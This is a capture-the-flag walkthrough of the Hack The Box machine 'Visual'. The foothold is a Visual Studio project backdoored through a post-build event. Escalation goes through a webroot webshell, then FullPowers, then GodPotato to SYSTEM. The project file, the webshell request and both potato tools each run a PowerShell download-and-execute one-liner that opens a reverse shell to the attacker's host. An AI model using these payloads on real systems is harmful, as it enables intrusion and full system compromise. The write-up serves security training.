# Visual - HTB

[[_TOC_]]

## Summary

<!-- markdownlint-disable MD033 -->
<div align="center"><img src="images/0.png"></div>

Visual is a fun, medium-rated Windows HTB machine created by [IsThisEnox](https://twitter.com/csenox1)

The foothold involves using Post-build Events to backdooring Visual Studio project.  
Afterwards, we first obtain a shell as `nt authority\local service` by writing in XAMPP webroot, recover `SeImpersonatePrivilege` by using `FullPowers.exe`, and use `GodPotato` for escalation for privileges.

## Initial recon

```console
opcode@debian$ nmap -v -p- --min-rate 2000 10.10.11.234
Nmap scan report for 10.10.11.234
Host is up (0.097s latency).
Not shown: 65534 filtered tcp ports (no-response)
PORT   STATE SERVICE
80/tcp open  http
```

```console
opcode@debian$ Nmap scan report for 10.10.11.234
Host is up (0.100s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.56 ((Win64) OpenSSL/1.1.1t PHP/8.1.17)
|_http-title: Visual - Revolutionizing Visual Studio Builds
|_http-server-header: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.1.17
```

Only the HTTP port (80) is open.

## Hosting a local `gitea` instance

<http://10.10.11.234/> leads to a minimal website that accepts a URL to a git repo containing a Visual Studio C# project and sends back the compiled `.exe` or `.dll`

![1](images/1.png)

The URL can be supplied to the input box at the bottom right:

![2](images/2.png)

Since HTB machines cannot access external internet, we need to host a repo on the attacker VM locally.  
A `gitea` container can be used for the same. Therefore, I created the corresponding `docker-compose.yml`:

```yml
version: "3"

networks:
  gitea:
    external: false

services:
  server:
    image: gitea/gitea:latest
    container_name: gitea
    environment:
      - USER_UID=1000
      - USER_GID=1000
    restart: always
    networks:
      - gitea
    volumes:
      - ./gitea:/data
      - /etc/timezone:/etc/timezone:ro
      - /etc/localtime:/etc/localtime:ro
    ports:
      - "3000:3000"
      - "222:22"
```

And started the container using `docker compose`:

```console
opcode@debian$ docker compose up
```

For initial configuration, we need to visit <http://127.0.0.1:3000/>. I left everything to default:

![3](images/3.png)

After the initial configuration, I registered an account with the credentials `opcode:opcodess`:

![4](images/4.png)

I also created a new repository and named it `fructone`. Besides `Repository Name`, I left other options untouched.

![5](images/5.png)

Now we have a local instance of `gitea` operational with an empty repository. We can proceed to the next step.

![6](images/6.png)

## Backdooring Visual Studio project with Post-build Events

The premise of this machine is straightforward. We need to find a way to backdoor our Visual Studio project so that it executes OS commands during the build process.  
Initially, I expected to find a corresponding CVE, but that approach failed. Unable to think of an alternative, I asked ChatGPT for a solution.  
Surprisingly, I received a precise answer:

![7](images/7.png)

We could have also found it by stalking the box author: <https://enox.zip/Windows/Exploring+Backdooring+Techniques+in+Visual+Studio+Projects>  
In Visual Studio, pre-build and post-build events are used to specify commands to be executed before and after the build process, respectively. These features can be used to backdoor Visual Studio projects to run malicious commands.

I already have Visual Studio 2022 installed on my Windows host, so I used it to create a new project.

![8](images/8.png)

We need to create a C# Console App

![9](images/9.png)

I named my project `Applinal`

![10](images/10.png)

For the framework, I selected .NET 6.0 LTS

![11](images/11.png)

It created a C# program for Hello World.  
Next, we need to modify `Applinal.csproj` to add a malicious Post-build Event:

```xml
<Project Sdk="Microsoft.NET.Sdk">

  <PropertyGroup>
    <OutputType>Exe</OutputType>
    <TargetFramework>net6.0</TargetFramework>
    <ImplicitUsings>enable</ImplicitUsings>
    <Nullable>enable</Nullable>
    <RunPostBuildEvent>OnBuildSuccess</RunPostBuildEvent>
  </PropertyGroup>

  <Target Name="PostBuild" AfterTargets="PostBuildEvent">
    <Exec Command="powershell.exe IEX(IWR http://10.10.14.107:8000/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell 10.10.14.107 9001" />
  </Target>

</Project>
```

We can initialize this project as a `git` repository and push it to the local `gitea` instance:

```console
opcode@debian$ git init --initial-branch=main
opcode@debian$ git add .
opcode@debian$ git commit -m "first commit"
opcode@debian$ git remote add origin http://127.0.0.1:3000/opcode/fructone.git
opcode@debian$ git push -u origin main
```

Provide the credentials when prompted, and you'll be done:

![12](images/12.png)

We can provide the URL <http://10.10.14.107:3000/opcode/fructone.git> to the input box on the website and wait for a reverse shell.  
The equivalent curl command is:

```console
opcode@parrot$ curl http://10.10.11.234/submit.php -d 'gitRepoLink=http://10.10.14.107:3000/opcode/fructone.git'
```

After a while, we'd receive a reverse shell as `enox`:

![13](images/13.png)

## Using .NET SDK container instead of a Windows Machine

In his video write-up, [ippsec](https://twitter.com/ippsec) used a .NET SDK container to generate the C# project.  
I think it's worth noting down.  
I also learnt about git bare repositories from [josewdf](https://github.com/josemlwdf). If we set up a bare repo, we'd no longer need `gitea`

We can use the [.NET SDK container](https://hub.docker.com/_/microsoft-dotnet-sdk) to generate a Visual Studio project.

```console
opcode@debian$ docker pull mcr.microsoft.com/dotnet/sdk:6.0
opcode@debian$ docker run -it --rm -p 8000:8000 -v $(pwd):/app -w /app --entrypoint=/bin/bash mcr.microsoft.com/dotnet/sdk:6.0
```

Inside the container, `dotnet` can be used to create a new C# console project:

```console
root@b4d7f091cd83:/app# mkdir fructone && cd fructone
root@b4d7f091cd83:/app/fructone# dotnet new console -n applinal
root@b4d7f091cd83:/app/fructone# ls applinal/
Program.cs  applinal.csproj  obj
```

The website needs us to include a `.sln` file in the project.

```console
root@b4d7f091cd83:/app/fructone# dotnet new sln
root@b4d7f091cd83:/app/fructone# dotnet sln fructone.sln add applinal/applinal.csproj
```

The project can be compiled with `dotnet publish -c Release -o out` or cross-compiled with `dotnet publish -c Release -o out -r win-x64 --self-contained false`.  
Modify `applinal.csproj` to include Post-build Event.  
We need to initialise this directory as a git repository:

```console
root@b4d7f091cd83:/app/fructone# git init --initial-branch=main
root@b4d7f091cd83:/app/fructone# git config --global --add safe.directory /app
root@b4d7f091cd83:/app/fructone# git add .
root@b4d7f091cd83:/app/fructone# git config --global user.email 'you@example.com'
root@b4d7f091cd83:/app/fructone# git config --global user.name 'opcode'
root@b4d7f091cd83:/app/fructone# git commit -m 'initial commit'
```

We can create a bare repository out of it:

```console
root@b4d7f091cd83:/app/fructone# cd ..
root@b4d7f091cd83:/app# git clone --bare fructone fructone.git
root@b4d7f091cd83:/app# cd fructone.git/
root@b4d7f091cd83:/app/fructone.git# git update-server-info
root@b4d7f091cd83:/app/fructone.git# cd ..
root@b4d7f091cd83:/app# apt update
root@b4d7f091cd83:/app# apt install python3
root@b4d7f091cd83:/app# python3 -m http.server 8000
```

I was supposed to be hosting `Invoke-ConPtyShell.ps1` on port 8000; I moved the script to the same directory as `fructone.git`  
The URL can be supplied to the website:

```console
opcode@parrot$ curl http://10.10.11.234/submit.php -d 'gitRepoLink=http://10.10.14.107:8000/fructone.git'
```

Once again, I received a shell as `enox`

## Post-shell enumeration

```console
PS C:\> whoami /all

USER INFORMATION
----------------

User Name   SID
=========== =============================================
visual\enox S-1-5-21-328618757-2344576039-2580610453-1003


GROUP INFORMATION
-----------------

Group Name                           Type             SID          Attributes
==================================== ================ ============ ==================================================
Everyone                             Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                        Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE                 Well-known group S-1-5-6      Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON                        Well-known group S-1-2-1      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users     Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization       Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account           Well-known group S-1-5-113    Mandatory group, Enabled by default, Enabled group
LOCAL                                Well-known group S-1-2-0      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication     Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label            S-1-16-12288


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== ========
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeCreateGlobalPrivilege       Create global objects          Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled

ERROR: Unable to get user claims information.
```

Nothing useful here.

```console
PS C:\> netstat -ano -p TCP | findstr LISTENING
  TCP    0.0.0.0:80             0.0.0.0:0              LISTENING       2156
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       892
  TCP    0.0.0.0:443            0.0.0.0:0              LISTENING       2156
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:5985           0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:47001          0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:49664          0.0.0.0:0              LISTENING       480
  TCP    0.0.0.0:49665          0.0.0.0:0              LISTENING       1056
  TCP    0.0.0.0:49666          0.0.0.0:0              LISTENING       1368
  TCP    0.0.0.0:49667          0.0.0.0:0              LISTENING       620
  TCP    0.0.0.0:49668          0.0.0.0:0              LISTENING       640
  TCP    10.10.11.234:139       0.0.0.0:0              LISTENING       4
```

It is a workstation/server, not a domain controller.  
Port 443 was not exposed. I forwarded it using [chisel](https://github.com/jpillora/chisel) to find the same application as on port 80.

I tried running [PrivescCheck](https://github.com/itm4n/PrivescCheck):

```console
PS C:\Windows\Tasks> IEX(IWR http://10.10.14.107:8080/PrivescCheck.ps1 -UseBasicParsing)
PS C:\Windows\Tasks> Invoke-PrivescCheck -Extended
```

It found a bunch of promising issues.

```console
┏━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┓ 
┃ CATEGORY ┃ TA0004 - Privilege Escalation                     ┃
┃ NAME     ┃ Non-default services                              ┃
┣━━━━━━━━━━┻━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┫
┃ Get information about third-party services. It does so by    ┃
┃ parsing the target executable's metadata and checking        ┃
┃ whether the publisher is Microsoft.                          ┃
┗━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┛
[*] Status: Informational 


Name        : ALG
DisplayName : @C:\Windows\system32\Alg.exe,-112
ImagePath   : C:\Windows\System32\alg.exe
User        : NT AUTHORITY\LocalService
StartMode   : Manual

Name        : ApacheHTTPServer
DisplayName : Apache HTTP Server
ImagePath   : "C:\Xampp\apache\bin\httpd.exe" -k runservice
User        : NT AUTHORITY\Local Service
StartMode   : Automatic

[--SNIP--]
```

The Apache webserver is running as `LocalService` and not `enox`

```console
┏━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┓
┃ CATEGORY ┃ TA0004 - Privilege Escalation                     ┃
┃ NAME     ┃ Service binary permissions                        ┃
┣━━━━━━━━━━┻━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┫
┃ Check whether the current user has any write permissions on  ┃
┃ a service's binary or its folder.                            ┃
┗━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┛
[*] Status: Vulnerable - High 


Name              : ApacheHTTPServer
ImagePath         : "C:\Xampp\apache\bin\httpd.exe" -k runservice
User              : NT AUTHORITY\Local Service
ModifiablePath    : C:\Xampp\apache\bin
IdentityReference : Everyone
Permissions       : WriteOwner, Delete, WriteAttributes, Synchronize, ReadControl, ListDirectory, AddSubdirectory, WriteExtendedAttributes, WriteDAC, ReadAttributes, AddFile,
                    ReadExtendedAttributes, DeleteChild, Traverse
Status            : Running
UserCanStart      : False
UserCanStop       : False

[--SNIP--]
```

I checked for permissions in webroot:

```console
PS C:\> Get-Acl -Path C:\xampp\htdocs | Format-List


Path   : Microsoft.PowerShell.Core\FileSystem::C:\xampp\htdocs 
Owner  : BUILTIN\Administrators
Group  : VISUAL\None
Access : Everyone Allow  FullControl
         Everyone Allow  FullControl
         NT AUTHORITY\SYSTEM Allow  FullControl
         BUILTIN\Administrators Allow  FullControl
         BUILTIN\Users Allow  ReadAndExecute, Synchronize
         BUILTIN\Users Allow  AppendData
         BUILTIN\Users Allow  CreateFiles
         CREATOR OWNER Allow  268435456
Audit  :
Sddl   : O:BAG:S-1-5-21-328618757-2344576039-2580610453-513D:AI(A;OICI;FA;;;WD)(A;OICIID;FA;;;WD)(A;OICIID;FA;;;SY)(A;OICIID;FA;;;BA)(A;OICIID;0x1200a9;;;BU)(A;CIID;LC;;;BU)(A;CIID;DC;;;BU)(A;OICIIOID;GA;;;CO)
```

We have write access to the webroot. Therefore, I placed a webshell:

```console
PS C:\xampp\htdocs> iwr 10.10.14.107:8000/webshell_ua.php -o webshell.php
```

Now, we can get OS command execution:

```console
opcode@parrot$ curl http://10.10.11.234/webshell.php -A 'whoami'
nt authority\local service
```

To get a shell as `nt authority\local service`, I used:

```console
opcode@parrot$ curl http://10.10.11.234/webshell.php -A 'powershell.exe IEX(IWR http://10.10.14.107:8000/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell 10.10.14.107 9001'
```

![14](images/14.png)

## Task Scheduler to reclaim Impersonation Privileges

```console
PS C:\xampp\htdocs> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== ========
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeCreateGlobalPrivilege       Create global objects          Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
```

I was expecting this service account to have the `SeImpersonatePrivilege`.  
I got fixated on finding an unintended in the release arena because the root blood was reasonably quick.  
I found an article explaining how to get rid of unnecessary privileges: [Hands off my service account!](https://decoder.cloud/2020/11/05/hands-off-my-service-account/)  
In the conclusion, the author claims that the "loopback pipe trick" can be used to get back those privileges.  
A PoC for the same can be found at <https://bugs.chromium.org/p/project-zero/issues/detail?id=2194>

I tried compiling the PoC:

```console
opcode@debian$ docker run -it --rm -v $(pwd):/app -w /app --entrypoint=/bin/bash mcr.microsoft.com/dotnet/sdk:6.0 
root@7acf5deb2dfb:/app# mkdir MainService && cd MainService
root@7acf5deb2dfb:/app/MainService# dotnet new console
root@7acf5deb2dfb:/app/MainService# dotnet new sln
root@7acf5deb2dfb:/app/MainService# dotnet sln MainService.sln add MainService.csproj
```

Next, I downloaded the PoC:

```console
root@7acf5deb2dfb:/app/MainService# wget 'https://bugs.chromium.org/p/project-zero/issues/attachment?aid=505939&signed_aid=Vb9m6UuOIGuyrMsEycCQag=='
root@7acf5deb2dfb:/app/MainService# mv 'attachment?aid=505939&signed_aid=Vb9m6UuOIGuyrMsEycCQag==' Program.cs 
```

We also need to take care of dependencies and cross-compile:

```console
root@7acf5deb2dfb:/app/MainService# dotnet add package System.ServiceProcess.ServiceController
root@7acf5deb2dfb:/app/MainService# dotnet publish -c Release -o out -r win-x64 --self-contained false
root@7acf5deb2dfb:/app/MainService# ls out/
MainService.deps.json  MainService.exe  MainService.runtimeconfig.json        System.Diagnostics.EventLog.dll
MainService.dll        MainService.pdb  System.Diagnostics.EventLog.Messages.dll  System.ServiceProcess.ServiceController.dll
```

We can transfer the files and execute:

```console
PS C:\Windows\Tasks> iwr 10.10.14.107:8000/MainService.exe -o MainService.exe
PS C:\Windows\Tasks> iwr 10.10.14.107:8000/MainService.dll -o MainService.dll
PS C:\Windows\Tasks> iwr 10.10.14.107:8000/MainService.runtimeconfig.json -o MainService.runtimeconfig.json
PS C:\Windows\Tasks> iwr 10.10.14.107:8000/System.ServiceProcess.ServiceController.dll -o System.ServiceProcess.ServiceController.dll
PS C:\Windows\Tasks> iwr 10.10.14.107:8000/System.Diagnostics.EventLog.dll -o System.Diagnostics.EventLog.dll
PS C:\Windows\Tasks> iwr 10.10.14.107:8000/System.Diagnostics.EventLog.Messages.dll -o System.Diagnostics.EventLog.Messages.dll
PS C:\Windows\Tasks> .\MainService.exe
Cannot start service from the command line or a debugger.  A Windows Service must first be installed and then started with the ServerExplorer, Windows Services Administrative tool or the NET START command.
```

I'm unsure if I did something wrong or how to debug the issue.  
So I searched more and found another article [Give Me Back My Privileges! Please?](https://itm4n.github.io/localservice-privileges/)  
In addition to the informative article, [itm4n](https://infosec.exchange/@itm4n) has also published his tool [FullPowers](https://github.com/itm4n/FullPowers), which automates the entire process.

I tried his tool:

```console
PS C:\Windows\Tasks> iwr 10.10.14.107:8000/FullPowers.exe -o FullPowers.exe 
PS C:\Windows\Tasks> .\FullPowers.exe -c 'powershell.exe'
[+] Started dummy thread with id 5000
[+] Successfully created scheduled task.
[+] Got new token! Privilege count: 7
[+] CreateProcessAsUser() OK
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\Windows\system32>  
```

It worked. Current security privileges:

![15](images/15.png)

Thanks to `SeImpersonatePrivilege`, we can use a potato exploit to get a shell as `NT AUTHORITY\SYSTEM`.  
I tried running [JuicyPotatoNG](https://github.com/antonioCoco/JuicyPotatoNG)  
For some reason, this shell obtained through `FullPowers.exe` does not have write access. I had to use another shell as `nt authority\local service` to transfer files.

```console
PS C:\Windows\Tasks> .\JuicyPotatoNG.exe -t * -p "cmd.exe" -a "/c powershell.exe IEX(IWR http://10.10.14.107:8000/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell 10.10.14.107 9001"

         JuicyPotatoNG
         by decoder_it & splinter_code

[*] Testing CLSID {854A20FB-2D44-457D-992F-EF13785D2B51} - COM server port 10247
[-] The privileged process failed to communicate with our COM Server :( Try a different COM port in the -l flag.
```

Ports seem to be filtered by Windows Firewall. I tried running with `-s`:

```console
PS C:\Windows\Tasks> .\JuicyPotatoNG.exe -s

         JuicyPotatoNG
         by decoder_it & splinter_code

[*] Finding suitable port not filtered by Windows Defender Firewall to be used in our local COM Server port.
[+] Found non filtered port: 80
[+] Found non filtered port: 5985
```

But those two ports are already in use.

I tried running [https://github.com/BeichenDream/GodPotato](GodPotato) because its implementation does not involve a COM listener port.

```console
PS C:\Windows\Tasks> .\GodPotato.exe -cmd "powershell.exe IEX(IWR http://10.10.14.107:8000/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell 10.10.14.107 9001"
[*] CombaseModule: 0x140713976725504 
[*] DispatchTable: 0x140713979031664
[*] UseProtseqFunction: 0x140713978407840
[*] UseProtseqFunctionParamCount: 6
[*] HookRPC
[*] Start PipeServer
[*] Trigger RPCSS
[*] CreateNamedPipe \\.\pipe\79aa998c-eaa8-447f-9da2-cbe93f446983\pipe\epmapper 
[*] DCOM obj GUID: 00000000-0000-0000-c000-000000000046
[*] DCOM obj IPID: 00000802-0648-ffff-7dbb-b2568d190d11
[*] DCOM obj OXID: 0x8429fc04f8d4b3be
[*] DCOM obj OID: 0x6c2108367bf3ee27
[*] DCOM obj Flags: 0x281
[*] DCOM obj PublicRefs: 0x0
[*] Marshal Object bytes len: 100 
[*] UnMarshal Object
[*] Pipe Connected!
[*] CurrentUser: NT AUTHORITY\NETWORK SERVICE 
[*] CurrentsImpersonationLevel: Impersonation 
[*] Start Search System Token
[*] PID : 892 Token:0x764  User: NT AUTHORITY\SYSTEM ImpersonationLevel: Impersonation 
[*] Find System Token : True
[*] UnmarshalObject: 0x80070776
[*] CurrentUser: NT AUTHORITY\SYSTEM 
[*] process start with pid 1324
```

And it worked. I received a shell as `NT AUTHORITY\SYSTEM`

![16](images/16.png)

After rooting, I enquired about the expected approach only to be caught off guard when I learnt that using `FullPowers.exe` was intended.
